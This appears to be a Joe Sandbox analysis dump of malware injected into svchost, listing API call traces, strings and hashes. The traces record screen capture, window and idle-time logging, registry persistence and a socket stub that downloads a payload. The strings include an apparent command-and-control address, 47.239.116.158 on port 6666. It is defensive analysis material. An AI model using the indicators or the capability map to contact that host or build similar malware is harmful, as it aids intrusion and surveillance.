                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                                                              • String ID: A:\$B:\
                                                                                                              • API String ID: 950920757-1009255891
                                                                                                              • Opcode ID: df951d4ce73a85ace69c5c9807b0f5e3b3f6ee0a1c06221bce3efc126110d374
                                                                                                              • Instruction ID: f0f1e712d7e6a3beb70e483207165941f1e5e633c8e9e6c34932fbf026e5ad19
                                                                                                              • Opcode Fuzzy Hash: df951d4ce73a85ace69c5c9807b0f5e3b3f6ee0a1c06221bce3efc126110d374
                                                                                                              • Instruction Fuzzy Hash: 8441A971B412189BEB20EFA5DC44AEDB3B8FF44315F014199EE0AA3144EB75BE05CB95
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DF5320: InterlockedDecrement.KERNEL32(00000008), ref: 04DF536F
                                                                                                                • Part of subcall function 04DF5320: SysFreeString.OLEAUT32(00000000), ref: 04DF5384
                                                                                                                • Part of subcall function 04DF5320: SysAllocString.OLEAUT32(04E16148), ref: 04DF53D5
                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,04E16148,04DF69F4,04E16148,00000000,75A773E0), ref: 04DF6844
                                                                                                              • GetLastError.KERNEL32 ref: 04DF684E
                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04DF6866
                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04DF686D
                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 04DF688F
                                                                                                              • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 04DF68C1
                                                                                                              • GetLastError.KERNEL32 ref: 04DF68CB
                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04DF6936
                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04DF693D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                                                              • String ID: NONE_MAPPED
                                                                                                              • API String ID: 1317816589-2950899194
                                                                                                              • Opcode ID: f4b5e03a6d10d88644cf818bf7aae7e82c4b767d0518447fbcde92eacfeec8a7
                                                                                                              • Instruction ID: ae2aee8faa7cffae335f3de9847a625a344894a5d275812b42c5b4103896991b
                                                                                                              • Opcode Fuzzy Hash: f4b5e03a6d10d88644cf818bf7aae7e82c4b767d0518447fbcde92eacfeec8a7
                                                                                                              • Instruction Fuzzy Hash: 684192B1A40208ABEB20DF65DD44FAEB7B9FB84701F41419DEB09A7140DA74AF85CF60
                                                                                                              APIs
                                                                                                              • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 04DFA4DD
                                                                                                              • _malloc.LIBCMT ref: 04DFA521
                                                                                                              • _free.LIBCMT ref: 04DFA553
                                                                                                              • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 04DFA572
                                                                                                              • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 04DFA5E4
                                                                                                              • GdipDisposeImage.GDIPLUS(00000000), ref: 04DFA5EF
                                                                                                              • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 04DFA615
                                                                                                              • GdipDisposeImage.GDIPLUS(00000000), ref: 04DFA62D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                                                              • String ID: &
                                                                                                              • API String ID: 2794124522-3042966939
                                                                                                              • Opcode ID: 0a5e34cc80520cd8c778c893d74dfb71b87634e8984a49c71b320c5788cc7ebd
                                                                                                              • Instruction ID: 75257731d8d3b46e58f4a9740d179c08c009429f08153e6b8369ab703252a0aa
                                                                                                              • Opcode Fuzzy Hash: 0a5e34cc80520cd8c778c893d74dfb71b87634e8984a49c71b320c5788cc7ebd
                                                                                                              • Instruction Fuzzy Hash: 82511FB1A002199FDB24DFA4DC44AAEB7B8FF48714F068119EA15A7350E634F945CBA0
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE,00000000,00000102,?), ref: 02585382
                                                                                                              • RegDeleteValueW.KERNELBASE(?,IpDates_info), ref: 02585392
                                                                                                              • RegSetValueExW.KERNELBASE(?,IpDates_info,00000000,00000003,0259C6E0,000012A0), ref: 025853B0
                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 025853BB
                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0258540F
                                                                                                              • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0258541B
                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 02585434
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                              • String ID: IpDates_info$SOFTWARE
                                                                                                              • API String ID: 864241144-2243437601
                                                                                                              • Opcode ID: 40ba056a0f997c5cd7baba615f3ba0c140a9a767045db25042142d69120e3857
                                                                                                              • Instruction ID: ff2022162a5c7905df02c82f31212bb438f9383980e249a6ef9b3a4d24ebaa47
                                                                                                              • Opcode Fuzzy Hash: 40ba056a0f997c5cd7baba615f3ba0c140a9a767045db25042142d69120e3857
                                                                                                              • Instruction Fuzzy Hash: 084168716542409BD311AF349808B7A7FA5FB59304FDB0849E182A6142FBF0D916C79E
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE,00000000,00000102,?), ref: 02585382
                                                                                                              • RegDeleteValueW.KERNELBASE(?,IpDates_info), ref: 02585392
                                                                                                              • RegSetValueExW.KERNELBASE(?,IpDates_info,00000000,00000003,0259C6E0,000012A0), ref: 025853B0
                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 025853BB
                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0258540F
                                                                                                              • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0258541B
                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 02585434
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                              • String ID: IpDates_info$SOFTWARE
                                                                                                              • API String ID: 864241144-2243437601
                                                                                                              • Opcode ID: 05f3f7a53053aaa02a3e407a130b235c4b6c24277a7bffc74b55976f837f47f8
                                                                                                              • Instruction ID: e0a17fa333423df7e084b416c564710e541fd6aa8abff3c96f456b42e78e1561
                                                                                                              • Opcode Fuzzy Hash: 05f3f7a53053aaa02a3e407a130b235c4b6c24277a7bffc74b55976f837f47f8
                                                                                                              • Instruction Fuzzy Hash: 1231B4706A43819FD711EF348808B7A7FA5BB49304FDE0849F685AA142EBF0D916C75D
                                                                                                              APIs
                                                                                                                • Part of subcall function 02587654: __fassign.LIBCMT ref: 0258764A
                                                                                                              • Sleep.KERNELBASE(00000000), ref: 0258614C
                                                                                                                • Part of subcall function 02586FF7: _malloc.LIBCMT ref: 02587011
                                                                                                              • Sleep.KERNELBASE(00000000), ref: 025862B1
                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 025862FD
                                                                                                                • Part of subcall function 02582C50: WSAStartup.WS2_32(00000202,?), ref: 02582CAF
                                                                                                                • Part of subcall function 02582C50: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 02582CBA
                                                                                                                • Part of subcall function 02582C50: InterlockedExchange.KERNEL32(00000018,00000000), ref: 02582CC8
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02586347
                                                                                                              • CloseHandle.KERNEL32(?), ref: 02586365
                                                                                                              • CloseHandle.KERNEL32(?), ref: 02586372
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateEventHandleSleep$ExchangeInterlockedObjectSingleStartupWait__fassign_malloc
                                                                                                              • String ID: 47.239.116.158$6666
                                                                                                              • API String ID: 3083163006-2305970290
                                                                                                              • Opcode ID: bddf16b73e43e4bb3e3f09e3ce427335fbb8edbce8c2cfee1f380705ed14bc45
                                                                                                              • Instruction ID: e479f7d09bfd1f0fa8d6f6777af3c3072348617e0491da71fbcc94d778dd61a7
                                                                                                              • Opcode Fuzzy Hash: bddf16b73e43e4bb3e3f09e3ce427335fbb8edbce8c2cfee1f380705ed14bc45
                                                                                                              • Instruction Fuzzy Hash: 6751E5B0E41206AFEF00FFA4DC81A6EBBB6BF4C714F140559E101B7285DBB09A14DB99
                                                                                                              APIs
                                                                                                              • socket.WS2_32(00000002,00000001,00000006,00000000,00000000,?,?,0017030E,00000001), ref: 00170350
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,0008000E,00003000,00000040,?,?,0017030E,00000001), ref: 0017036C
                                                                                                              • connect.WS2_32(?,?,00000010), ref: 001703C9
                                                                                                              • send.WS2_32(?,00000001,00000003,00000000), ref: 001703EA
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,0004D800,00003000,00000004), ref: 00170404
                                                                                                              • recv.WS2_32(?,00000001,00019000,00000000), ref: 0017041F
                                                                                                              • VirtualFree.KERNELBASE(00000001,00000000,00008000), ref: 0017044A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340160722.0000000000170000.00000040.00000400.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_170000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$Alloc$Freeconnectrecvsendsocket
                                                                                                              • String ID: 32
                                                                                                              • API String ID: 799107390-2103780943
                                                                                                              • Opcode ID: 39020c141edd0a27ad9db8511efb2f7b938b6a5ba6550bf8215b5bfbcc17140d
                                                                                                              • Instruction ID: e008b880b53f8a7cb7b28c9b62a756a576dc2d0974ee44b9e2e8f7f07f8cc3c7
                                                                                                              • Opcode Fuzzy Hash: 39020c141edd0a27ad9db8511efb2f7b938b6a5ba6550bf8215b5bfbcc17140d
                                                                                                              • Instruction Fuzzy Hash: 1E518D70900304EFCF269F69C889B9E7F79EF48724F148195FE09AA196D771DA81CB90
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Console\0,00000000,000F003F,04E12358,E179827C,00000001,00000000,00000000), ref: 04DFCB01
                                                                                                              • RegQueryInfoKeyW.ADVAPI32(04E12358,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 04DFCB30
                                                                                                              • _memset.LIBCMT ref: 04DFCB94
                                                                                                              • _memset.LIBCMT ref: 04DFCBA3
                                                                                                              • RegEnumValueW.KERNELBASE(04E12358,?,00000000,?,00000000,?,00000000,?), ref: 04DFCBC2
                                                                                                                • Part of subcall function 04DFF757: _malloc.LIBCMT ref: 04DFF771
                                                                                                                • Part of subcall function 04DFF757: std::exception::exception.LIBCMT ref: 04DFF7A6
                                                                                                                • Part of subcall function 04DFF757: std::exception::exception.LIBCMT ref: 04DFF7C0
                                                                                                                • Part of subcall function 04DFF757: __CxxThrowException@8.LIBCMT ref: 04DFF7D1
                                                                                                              • RegCloseKey.KERNELBASE(04E12358,?,?,?,?,?,?,?,?,?,?,?,00000000,04E12358,000000FF), ref: 04DFCCD3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                                                              • String ID: Console\0
                                                                                                              • API String ID: 1348767993-1253790388
                                                                                                              • Opcode ID: 133dff8ddaf0296e2afc5f77e82561688f9df6f4ff2fe2bb4ab3009cc50e2f2a
                                                                                                              • Instruction ID: 6a95085e13d300d59ac3bf422c9b0db68cdcf83cf968e5d5175be57f1c219567
                                                                                                              • Opcode Fuzzy Hash: 133dff8ddaf0296e2afc5f77e82561688f9df6f4ff2fe2bb4ab3009cc50e2f2a
                                                                                                              • Instruction Fuzzy Hash: 6E613DB5A00209AFDB14DFA8DC80EAEB7B8FF48314F15416AEA15E7245D735AD01CBA0
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DFF757: _malloc.LIBCMT ref: 04DFF771
                                                                                                              • _memset.LIBCMT ref: 04DFBB71
                                                                                                              • GetLastInputInfo.USER32(?), ref: 04DFBB87
                                                                                                              • GetTickCount.KERNEL32 ref: 04DFBB8D
                                                                                                              • wsprintfW.USER32 ref: 04DFBBB6
                                                                                                              • GetForegroundWindow.USER32 ref: 04DFBBBF
                                                                                                              • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 04DFBBD3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                                                              • String ID: %d min
                                                                                                              • API String ID: 3754759880-1947832151
                                                                                                              • Opcode ID: e4d1ea22d592ffed3be516574fc06584b81183932947d7a8808cdff2476c178c
                                                                                                              • Instruction ID: 4dc97a2ef4f3c59043d8a6637a00fb12d93cf024fb090c7cd72e4574c6dc0bad
                                                                                                              • Opcode Fuzzy Hash: e4d1ea22d592ffed3be516574fc06584b81183932947d7a8808cdff2476c178c
                                                                                                              • Instruction Fuzzy Hash: F741D3B5A00114AFDB10EFA4DC84E9FBBB8EF44704F058059EE099B355EA74BA00CBE1
                                                                                                              APIs
                                                                                                              • GetCurrentProcessId.KERNEL32(E179827C,00000000,00000000,75A773E0,?,00000000,04E1213B,000000FF,?,04DF6B03,00000000), ref: 04DF6988
                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,04E1213B,000000FF,?,04DF6B03,00000000), ref: 04DF6997
                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,04E1213B,000000FF,?,04DF6B03,00000000), ref: 04DF69B0
                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,04E1213B,000000FF,?,04DF6B03,00000000), ref: 04DF69BB
                                                                                                              • SysStringLen.OLEAUT32(00000000), ref: 04DF6A0E
                                                                                                              • SysStringLen.OLEAUT32(00000000), ref: 04DF6A1C
                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,00000000,04E1213B,000000FF), ref: 04DF6A7E
                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,04E1213B,000000FF), ref: 04DF6A84
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                                                              • String ID:
                                                                                                              • API String ID: 429299433-0
                                                                                                              • Opcode ID: eb633ca7166c5b22006ee0ce09b73feb3dc35fcd7afb8f172b03a58286b7ed0c
                                                                                                              • Instruction ID: 1ceaddf66c5fc6a28a8e4731225b1b2ab97d727f359ab40789d37dead0a55ed6
                                                                                                              • Opcode Fuzzy Hash: eb633ca7166c5b22006ee0ce09b73feb3dc35fcd7afb8f172b03a58286b7ed0c
                                                                                                              • Instruction Fuzzy Hash: 3941D7B2E801149FDB20DFA9DC40AAEFBF8FB44714F158615EA15E7640E735AD01CBA0
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 04DF6E29
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,04E16164,00000000,00020019,75A773E0), ref: 04DF6E4C
                                                                                                              • RegQueryValueExW.KERNELBASE(75A773E0,GROUP,00000000,00000001,?,00000208), ref: 04DF6E9A
                                                                                                              • lstrcmpW.KERNEL32(?,04E16148), ref: 04DF6EB0
                                                                                                              • lstrcpyW.KERNEL32(04DF56EA,?), ref: 04DF6EC2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                                                              • String ID: GROUP
                                                                                                              • API String ID: 2102619503-2593425013
                                                                                                              • Opcode ID: 10a224c48229fb4e8730d1eee8b51401a6655a08fe5af7a9b18082e06a37cf79
                                                                                                              • Instruction ID: 5f619e6c930eba6624faed14d707c1915a3d3bf752b7359aabbcc4f50af3ce6a
                                                                                                              • Opcode Fuzzy Hash: 10a224c48229fb4e8730d1eee8b51401a6655a08fe5af7a9b18082e06a37cf79
                                                                                                              • Instruction Fuzzy Hash: 4931B871A40318ABDB30DF90DC4DB9EB7B8FB08710F104299E519A7190DB74EA45CF50
                                                                                                              APIs
                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 02587320
                                                                                                              • __calloc_crt.LIBCMT ref: 0258732C
                                                                                                              • __getptd.LIBCMT ref: 02587339
                                                                                                              • CreateThread.KERNELBASE(?,?,02587296,00000000,?,?), ref: 02587370
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0258737A
                                                                                                              • _free.LIBCMT ref: 02587383
                                                                                                              • __dosmaperr.LIBCMT ref: 0258738E
                                                                                                                • Part of subcall function 025871ED: __getptd_noexit.LIBCMT ref: 025871ED
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 155776804-0
                                                                                                              • Opcode ID: 3e5cf604f6306b85e5ebdf852ae04c814d21e5f85e7a925d5074363f12ddc35b
                                                                                                              • Instruction ID: 500c0b7bfb7d1b1026b95074f547afb7e44f060da009755e81dcea862698a096
                                                                                                              • Opcode Fuzzy Hash: 3e5cf604f6306b85e5ebdf852ae04c814d21e5f85e7a925d5074363f12ddc35b
                                                                                                              • Instruction Fuzzy Hash: 1D11E936154307AFDB11BFA5DC40E6B7B99FF89774B200419F915A6140DFF1D4108AAD
                                                                                                              APIs
                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 04DFFA9E
                                                                                                              • __calloc_crt.LIBCMT ref: 04DFFAAA
                                                                                                              • __getptd.LIBCMT ref: 04DFFAB7
                                                                                                              • CreateThread.KERNELBASE(?,?,04DFFA14,00000000,?,?), ref: 04DFFAEE
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 04DFFAF8
                                                                                                              • _free.LIBCMT ref: 04DFFB01
                                                                                                              • __dosmaperr.LIBCMT ref: 04DFFB0C
                                                                                                                • Part of subcall function 04DFF96B: __getptd_noexit.LIBCMT ref: 04DFF96B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 155776804-0
• Opcode ID: 0b8685689e52ca5bb550ece2ae510098eeeed5a30460f6740204c7c03d2d36fb
• Instruction ID: 6943d60492ed845d55a576b42a8f3034d3fe8a00b5fd683025cb2094a2116cb2
• Opcode Fuzzy Hash: 0b8685689e52ca5bb550ece2ae510098eeeed5a30460f6740204c7c03d2d36fb
• Instruction Fuzzy Hash: 4211A5322047067FEB31AFA5AC80D9F3798EF05768B12412EFE1496191EB71F8418A70
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04DF7573), ref: 04DF748D
• GetProcAddress.KERNEL32(00000000), ref: 04DF7494
• GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,04DF7573), ref: 04DF74A2
• GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,04DF7573), ref: 04DF74AA
Strings
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: InfoSystem$AddressHandleModuleNativeProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 3433367815-192647395
• Opcode ID: ceb737b967f77e76da760bfb57e624dbc2958f9ebc3418541fa502ae4cb55ad2
• Instruction ID: 27e8cb30b9f98d06c38cd9f6d9d95f0795e0119432d7c24da74607aed767de44
• Opcode Fuzzy Hash: ceb737b967f77e76da760bfb57e624dbc2958f9ebc3418541fa502ae4cb55ad2
• Instruction Fuzzy Hash: 6601E874E402099FDB50DFB999446EEBBF5EB08301F504669D909E3244EA3AAA40CF61
APIs
• ___set_flsgetvalue.LIBCMT ref: 0258729C
  • Part of subcall function 025897C0: TlsGetValue.KERNEL32(00000000,02589919,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000,00000000), ref: 025897C9
  • Part of subcall function 025897C0: DecodePointer.KERNEL32(?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000,00000000,?,02589A26,0000000D), ref: 025897DB
  • Part of subcall function 025897C0: TlsSetValue.KERNEL32(00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000,00000000,?,02589A26), ref: 025897EA
• ___fls_getvalue@4.LIBCMT ref: 025872A7
  • Part of subcall function 025897A0: TlsGetValue.KERNEL32(?,?,025872AC,00000000), ref: 025897AE
• ___fls_setvalue@8.LIBCMT ref: 025872BA
  • Part of subcall function 025897F4: DecodePointer.KERNEL32(?,?,?,025872BF,00000000,?,00000000), ref: 02589805
• GetLastError.KERNEL32(00000000,?,00000000), ref: 025872C3
• ExitThread.KERNEL32 ref: 025872CA
• GetCurrentThreadId.KERNEL32 ref: 025872D0
• __freefls@4.LIBCMT ref: 025872F0
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 2383549826-0
• Opcode ID: ad03bac6dd2dba25e95c0c1eed99e7670361269600238f2225b782b01771fc2f
• Instruction ID: 1773c1fd6844705cf9efa6d385b618c7d2fe770742c84b5eccef26191d10ed89
• Opcode Fuzzy Hash: ad03bac6dd2dba25e95c0c1eed99e7670361269600238f2225b782b01771fc2f
• Instruction Fuzzy Hash: AFF06274400646ABC704BF71C44892E7FAABFCA3003218854E906E7311EB74D406DE99
APIs
• ___set_flsgetvalue.LIBCMT ref: 04DFFA1A
  • Part of subcall function 04E03CF0: TlsGetValue.KERNEL32(00000000,04E03E49,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6,00000000,00000000), ref: 04E03CF9
  • Part of subcall function 04E03CF0: DecodePointer.KERNEL32(?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6,00000000,00000000,?,04E03F56,0000000D), ref: 04E03D0B
  • Part of subcall function 04E03CF0: TlsSetValue.KERNEL32(00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6,00000000,00000000,?,04E03F56), ref: 04E03D1A
• ___fls_getvalue@4.LIBCMT ref: 04DFFA25
  • Part of subcall function 04E03CD0: TlsGetValue.KERNEL32(?,?,04DFFA2A,00000000), ref: 04E03CDE
• ___fls_setvalue@8.LIBCMT ref: 04DFFA38
  • Part of subcall function 04E03D24: DecodePointer.KERNEL32(?,?,?,04DFFA3D,00000000,?,00000000), ref: 04E03D35
• GetLastError.KERNEL32(00000000,?,00000000), ref: 04DFFA41
• ExitThread.KERNEL32 ref: 04DFFA48
• GetCurrentThreadId.KERNEL32 ref: 04DFFA4E
• __freefls@4.LIBCMT ref: 04DFFA6E
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 2383549826-0
• Opcode ID: 915ae9b596e2e4c4b53662a3c78fdc799d851fb8a8907fe10d16e2dfb10fa6e5
• Instruction ID: 3c5703eba9a4291909ae14a9e573466201f6d1d6f7a3f81a8f89cc6e133bb20b
• Opcode Fuzzy Hash: 915ae9b596e2e4c4b53662a3c78fdc799d851fb8a8907fe10d16e2dfb10fa6e5
• Instruction Fuzzy Hash: 01F09074600600AFE714BF72CA48C0EBBA8FF48209711C199ED59E7265DA34F882CBA1
APIs
• _memset.LIBCMT ref: 04DF60CC
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 04DF60D8
• Process32FirstW.KERNEL32(00000000,00000000), ref: 04DF6109
